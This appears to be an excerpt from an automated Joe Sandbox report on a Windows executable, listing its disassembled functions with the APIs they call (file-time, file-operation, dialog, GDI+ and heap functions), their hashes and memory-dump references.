Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 80f86f40945bf95fab469b95cd552fd2fab2dc2bec38d9ab051d2d8af1be0b93
Instruction ID: 9ddc6adcbf3e78253c7fa70e8c6cb8952d254bfb49c799faa9f86024297f901a
Opcode Fuzzy Hash: 80f86f40945bf95fab469b95cd552fd2fab2dc2bec38d9ab051d2d8af1be0b93
Instruction Fuzzy Hash: EF4119716043459BD7249F64C4846BAB3F5FB89324F10C91DEAAD83241D7F0DE84AB61

Function 00173C12 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?), ref: 00173C2C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00173CE0

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: e2bcb59ad3a802a7e224abd2765be165bbb05b71ac4cb3024b82beebbee7af39
Instruction ID: c526585906b85ec1dbbfc4d424aab4ef96e49273615c3bbc28f62ddda8e453e1
Opcode Fuzzy Hash: e2bcb59ad3a802a7e224abd2765be165bbb05b71ac4cb3024b82beebbee7af39
Instruction Fuzzy Hash: E321E631248245AFC716CF35C895AABBBF4AFA5704F08881EF4E993151D339EA0CE752

Function 00186B0C Relevance: 3.1, APIs: 2, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00186B13
SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,001CAAAC), ref: 00186BE5

Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: FileH_prolog3_Operation_wcslen
String ID:
API String ID: 3104323202-0
Opcode ID: 6ce47d9053945b09a3df59dba1ff1fa8f200873dc2384bb07c85ce87d4f8a39d
Instruction ID: 6083e461971d1f7aa397f211bb2df1587be2ce3db127270389bafffb546a1942
Opcode Fuzzy Hash: 6ce47d9053945b09a3df59dba1ff1fa8f200873dc2384bb07c85ce87d4f8a39d
Instruction Fuzzy Hash: 6D310471D00208EADB15EFE9C996AECBBB4BF28354F54412EE409A7192EB305A45CF61

Function 00173CF0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00173D37
GetLastError.KERNEL32 ref: 00173D44

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 904f9f44271173ab9687110d165edb510e5c277af386ec89057c9a9eb22d446f
Instruction ID: f6279a8f520a272dd50ce7954d332be7acf276cfe35c51cb6e1239a183a64388
Opcode Fuzzy Hash: 904f9f44271173ab9687110d165edb510e5c277af386ec89057c9a9eb22d446f
Instruction Fuzzy Hash: E9110831604700ABD73596A8C940BA6B3F8EB45371FA08629E17BD25D0D770EE45E760

Function 00171A16 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00171A1D
GetDlgItem.USER32(?,?), ref: 00171A35

Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3_Item_wcslen
String ID:
API String ID: 896027972-0
Opcode ID: 3f1e9feca2711a857764e56467736fa71b41c07734528b1f40bf9174c29efa24
Instruction ID: b9bb8ba00e5b2e47b996442272069258b3e36b6b68dee0106e617a32418aa84d
Opcode Fuzzy Hash: 3f1e9feca2711a857764e56467736fa71b41c07734528b1f40bf9174c29efa24
Instruction Fuzzy Hash: 9601F771A41304AFD714EF6CC892BEDB7F8AF64740F04400AF909A3191CB709E41CB50

Function 001865C3 Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,001A086E,000000FF), ref: 00186601
OleUninitialize.OLE32(?,?,?,?,001A086E,000000FF), ref: 00186606

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 58255021fece6061f1584ba54caf933f3bf7b1613faa8ea347ccacb6ae19e7a5
Instruction ID: 446e1a7472ba2fa86ba328b9c13ff31c20e62e5e05bb4eb19b2b0ff571d10087
Opcode Fuzzy Hash: 58255021fece6061f1584ba54caf933f3bf7b1613faa8ea347ccacb6ae19e7a5
Instruction Fuzzy Hash: F5F08276604604EFD701DB59EC05F4ABBF8FB49B20F004226F816C3B60DB34A880CB90

Function 00186D92 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00186D99
_wcslen.LIBCMT ref: 00186DC3

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3_catch_wcslen
String ID:
API String ID: 1260878687-0
Opcode ID: 4194e763630cf770e47e715cd1f8504d63a16d44f7b05623717675fa042b8e9e
Instruction ID: d962944cc96dc25667d2a5fa2d604d4e9db75bd3339ad97cb591dbc7dae8965e
Opcode Fuzzy Hash: 4194e763630cf770e47e715cd1f8504d63a16d44f7b05623717675fa042b8e9e
Instruction Fuzzy Hash: 56F0FE7590011DABCF01FFA4D902AEF7BB8AF18300F204026B504B7141DB315B458FA5

Function 00185919 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0018593A
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00185941

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 16ec5525d4c7e4a5d073f88bd94a475cfb70a5bd67d4a2787a74f89a5d431601
Instruction ID: cc8610cf9f21a1422070813dabc3a9df16ef262e750d89a11be49cd9c9ab1375
Opcode Fuzzy Hash: 16ec5525d4c7e4a5d073f88bd94a475cfb70a5bd67d4a2787a74f89a5d431601
Instruction Fuzzy Hash: 32E0EDB1900318EFCB10EF58C541B9DBBE8FB05764F10805AE855A3601E370AF04EFA1

Function 00171B53 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00171B68
ShowWindow.USER32(00000000), ref: 00171B6F

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: f325730c9daacbb3f0f02768fbcfb15d2d9d56a85cb4b6e7dd0b2c166238ecdf
Instruction ID: ad4e24e5d81d373306853674fe4f35c7a7d561276e41f746a0e4606c584911eb
Opcode Fuzzy Hash: f325730c9daacbb3f0f02768fbcfb15d2d9d56a85cb4b6e7dd0b2c166238ecdf
Instruction Fuzzy Hash: F8C01232458200FECB014BB1DC09C2EBFA8ABA5212F18C908F0AAC1061C238C850DB91

Function 001719F8 Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00171A06
KiUserCallbackDispatcher.NTDLL(00000000), ref: 00171A0D

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CallbackDispatcherItemUser
String ID:
API String ID: 4250310104-0
Opcode ID: b5b758718559274e963216fed8e0bbc897e77d37692df626bfde182d3a13d16c
Instruction ID: 06e312707c7ed1da0612cc18061aee7da81d92d0813ba0eceb48bc7e33bcc45b
Opcode Fuzzy Hash: b5b758718559274e963216fed8e0bbc897e77d37692df626bfde182d3a13d16c
Instruction Fuzzy Hash: DEC04C76408240FFCB019BA69D18C2FFFA9AB95311F04C809F1AD80821C635C850DB51

Function 00181380 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00181387

Part of subcall function 00181D76: __EH_prolog3_GS.LIBCMT ref: 00181D7D

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3_
String ID:
API String ID: 2427045233-0
Opcode ID: bd951b334dd2ed9b15592d1d74da19a12da1883d4cfac39ff1cb80493bd8b152
Instruction ID: b2b6b4a392237d8ecd9ed73f8f4ae661fef95026f41175043a0b483bcb7893ad
Opcode Fuzzy Hash: bd951b334dd2ed9b15592d1d74da19a12da1883d4cfac39ff1cb80493bd8b152
Instruction Fuzzy Hash: 62415E71D00258ABCF25EFE9C8C5ADCBBB8BF59354F94806ED009A7251DB304A86CF11

Function 0017F7FA Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0017F81B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: __allrem
String ID:
API String ID: 2933888876-0
Opcode ID: 85601d6f0b9176b9c8a5baf5e22cd01c2d064e4bb9c13a41ca3ca97244749833
Instruction ID: 72fa437a8aeca60f5efbe498c3107ce484a5bc4454c63fd5792d7df888f1e8c8
Opcode Fuzzy Hash: 85601d6f0b9176b9c8a5baf5e22cd01c2d064e4bb9c13a41ca3ca97244749833
Instruction Fuzzy Hash: 35317435A012248BC706DF18AC58E2A3BB5FF98754B59402EE905D7771D730EC828B93

Function 00174235 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0017423C

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3_
String ID:
API String ID: 2427045233-0
Opcode ID: 13bb1450ba16af977e45fd5d39796c5261d46d34ac33a07237e6c3393cba2601
Instruction ID: b0244961cecfd965ae2b8e8fbaa0ea16da32d7a92d63e0504994d35ffdfbb9cf
Opcode Fuzzy Hash: 13bb1450ba16af977e45fd5d39796c5261d46d34ac33a07237e6c3393cba2601
Instruction Fuzzy Hash: 7A21D230640304ABDF20DEA4A842EFEB3B9AF62B40F508558F489A7182D7349E59C7A0

Function 0017F4EE Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0017F4F5

Part of subcall function 00174C75: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174C9D

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CloseFindH_prolog3_
String ID:
API String ID: 2672038326-0
Opcode ID: e3fe578055cb98b6dc7115d5ebfdf3c6e07a0fa632cda4a9bb9bcdc140f87a22
Instruction ID: 951ffced23a6e85f00e5e19f9b645e13c972ceb3f0b30c85e2bcb522a1101180
Opcode Fuzzy Hash: e3fe578055cb98b6dc7115d5ebfdf3c6e07a0fa632cda4a9bb9bcdc140f87a22
Instruction Fuzzy Hash: 12214F70E053189BDF19DFB8D9456AE7BB1BF19704F50803EE409A7352DB304A069F55

Function 0017B85D Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0018B15E

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3_
String ID:
API String ID: 2427045233-0
Opcode ID: 5e9974f9183714af965f40a80284775e07c95b0d39d773c1f0cd8e1a1c6ff080
Instruction ID: 573dfe35db25dd0b2fda1769a5511a7efa857e1192281139e1529be2286b2259
Opcode Fuzzy Hash: 5e9974f9183714af965f40a80284775e07c95b0d39d773c1f0cd8e1a1c6ff080
Instruction Fuzzy Hash: 402142B1904108AEDB08EFA4D995EEE7BB9BF58300F54401AF505EB251D731AB85CB61

Function 00199819 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 001984D6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0019681A,00000001,00000364,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E), ref: 00198517

_free.LIBCMT ref: 00199885

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: cad4fd7691973b889dac81a4565274e961a8517fcde5adeb8a615647a0e82bc5
Instruction ID: 4e23a6d816716d6e1546a200eebc90735ef1be797a78bd4244d1d46451355e98
Opcode Fuzzy Hash: cad4fd7691973b889dac81a4565274e961a8517fcde5adeb8a615647a0e82bc5
Instruction Fuzzy Hash: 520126732003096BEB258F69D845D5AFBD8EF8A370F25062DE59587280EB30A805C674

Function 0018B0DA Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0018B0E1

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3_
String ID:
API String ID: 2427045233-0
Opcode ID: c7c520b4a3678ea5d572e90ae140888c9a40f438b803cc1f09530a37a71c6d1b
Instruction ID: f41d83b2d65787ff5f6d6c101490215aaf4e6e7a222815e31130972cf5aa6125
Opcode Fuzzy Hash: c7c520b4a3678ea5d572e90ae140888c9a40f438b803cc1f09530a37a71c6d1b
Instruction Fuzzy Hash: 3E016D70904108ABDB00FBE4CD96BDE77B8AF25315F448065F404AA182DB349788CB71

Function 001984D6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0019681A,00000001,00000364,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E), ref: 00198517

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ab9446da2939af118138d13d4ec6db54853d105e9e3f1c57efa7ca4264279a30
Instruction ID: 36991f2a8bb53708798a4463d84213e6bf3016bbc312671a7c5dce64aae15fbb
Opcode Fuzzy Hash: ab9446da2939af118138d13d4ec6db54853d105e9e3f1c57efa7ca4264279a30
Instruction Fuzzy Hash: 1AF0E232649221A7EF215B22AC05FAB3B48EF43B70B2B8016F808E7190CF70DD0586F0

Function 00196B6E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0018C17E,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?,?,?,?), ref: 00196BA0

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 16f7bc5b2ea7cbe3f8244a75966b0c939f82c38357ea7792b0d30de68114d1d8
Instruction ID: ebd90cc24e4dbd98ed9b1226a69305f8589c2bf7fbcb1de2c1362741d5fc40a2
Opcode Fuzzy Hash: 16f7bc5b2ea7cbe3f8244a75966b0c939f82c38357ea7792b0d30de68114d1d8
Instruction Fuzzy Hash: 05E06D363452215ADF313B65DC01F6F3E8CDF527A1F1A0121EC56E6191EB61DC4082F1

Function 00173340 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00173301,?,?,B19080A7,?,?,0019FC52,000000FF), ref: 0017335B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 97551f1bcedcbcffd8ac3e39966500f94be55f1a06eabe5453f1648d14429358
Instruction ID: 715ebd4e64d850f740d9ae430c51b7dca4766e24b4aacbe35d2dd6bf94f509b4
Opcode Fuzzy Hash: 97551f1bcedcbcffd8ac3e39966500f94be55f1a06eabe5453f1648d14429358
Instruction Fuzzy Hash: 0FF0A770445B41CFE7344B28D54479277F47B15361F048B1EE0FA428E0CB70AA89E650

Function 00174C75 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00174D8A: __EH_prolog3_GS.LIBCMT ref: 00174D94
Part of subcall function 00174D8A: FindFirstFileW.KERNELBASE(?,-00000278,00000274,00174C97,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174DBD
Part of subcall function 00174D8A: FindFirstFileW.KERNELBASE(-00000028,-00000278,?,-00000028,?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E08
